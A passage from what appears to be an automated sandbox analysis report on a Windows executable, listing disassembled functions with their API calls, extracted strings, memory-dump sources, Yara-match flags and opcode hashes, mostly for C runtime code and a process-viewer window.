                                    • Instruction Fuzzy Hash: 36A1D571A087068FC758DF68D54962E7BE5BBC4300F00492DF686AB2A4E778DD09CB92
                                    Function 00413E30 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00013DEE), ref: 00413E35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction ID: 123ae4dee83c8ecde87b64a495cd6158ef4cf236bc87e197f895214c45768a6d
                                    • Opcode Fuzzy Hash: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction Fuzzy Hash: 8C9002B43521005647002B726C295C52D905A4C623B9144B1E409C5054DA554688951E
                                    Function 00601C70 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: cedde206f0f59ecf413341c8fb1e5ddeafa856b9eff8ac45936b31663709639c
                                    • Instruction ID: 199c82f012c1b3d585506ab725660c616c4e9c7d21aa09f8ca91788eae1b9eca
                                    • Opcode Fuzzy Hash: cedde206f0f59ecf413341c8fb1e5ddeafa856b9eff8ac45936b31663709639c
                                    • Instruction Fuzzy Hash: A44187B16483019FC348EF68D84506BB7E6FFD5714F408D2DE49A8B3A0D7B899058F82
                                    Function 005F380E Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction ID: a4ef1b2fefedf2e0686fb2c55d4bd8005fd8afe73a7f8fd4a288738e3efc94df
                                    • Opcode Fuzzy Hash: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction Fuzzy Hash: 20418D71A087059FD308EF64C94502EB7E1BFD5714F408C2DE5D987264D7B89916CF42
                                    Function 00603E40 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: aa7a5b408a14f24676e19c11f71732be0c5034c98a190a30652478e543f48e21
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: B341F1B19093968BD314DF18E18946BB7F5FB80B15F004D5EF4A09A291E3B4DA4CCBA3
                                    Function 005F59DE Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: f473f3570c16826d77451b9ecdcd101c455dd3b49d251d2e4a5980bdc96622b6
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: BB41E2B150939A8BD314DF14E18846BBBE0FB80715F404E5EF5A19B251E3B8DA5CCBA3
                                    Function 005F095E Relevance: .4, Instructions: 362COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                    • Instruction ID: fba1ddaebf6ba0661dd4ef5a84b6cd5216cd9576a71e7ab75de673a33984f360
                                    • Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                    • Instruction Fuzzy Hash: F5F120B4A01209EFDB04DF94C994BAEBBB1FF48304F248558EA06A7386D775EE41DB50
                                    Function 005F0456 Relevance: .1, Instructions: 80COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction ID: 050fbb030783bbccb0c69090dab3363382d2d3d2bf9eeff31fd1a260ac936f65
                                    • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction Fuzzy Hash: A231D53660434A8FCB10DF18C480936BBE4FF88314F49196DEA9587353D338F9068B91
                                    Function 00604D00 Relevance: .0, Instructions: 2COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    Function 005F689E Relevance: .0, Instructions: 2COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    Function 00413A77 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,77385810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,77385810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    Function 0040F7B0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 190windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • View All Processes, xrefs: 0040F991
                                    • View My Processes, xrefs: 0040F9AC
                                    • iPos=%d, xrefs: 0040F925
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    • System process can't been terminated!, xrefs: 0040F950
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    Function 0040E800 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 76windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    Function 0040E2A0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    Function 0040E4B0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 153COMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
                                    Function 020E14A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 020E14DB
                                    • SetLastError.KERNEL32(0000007F), ref: 020E1507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 572edad0e6a7003d4b6a09a2481ca24e2fc325748b3e5ba5c9a858bfadb08a85
                                    • Instruction ID: 47e2216d65cba6e9897770bd83dc728bff5c2615ee91574a75403075f9f1f1b5
                                    • Opcode Fuzzy Hash: 572edad0e6a7003d4b6a09a2481ca24e2fc325748b3e5ba5c9a858bfadb08a85
                                    • Instruction Fuzzy Hash: 4471C4B4E04209EFDF08DF94C591BADB7B2BF48304F248599D51AAB391D734AE81DB90
                                    Function 0040E720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47processCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    Function 00413801 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    Function 00412B32 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    Function 00412DE4 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
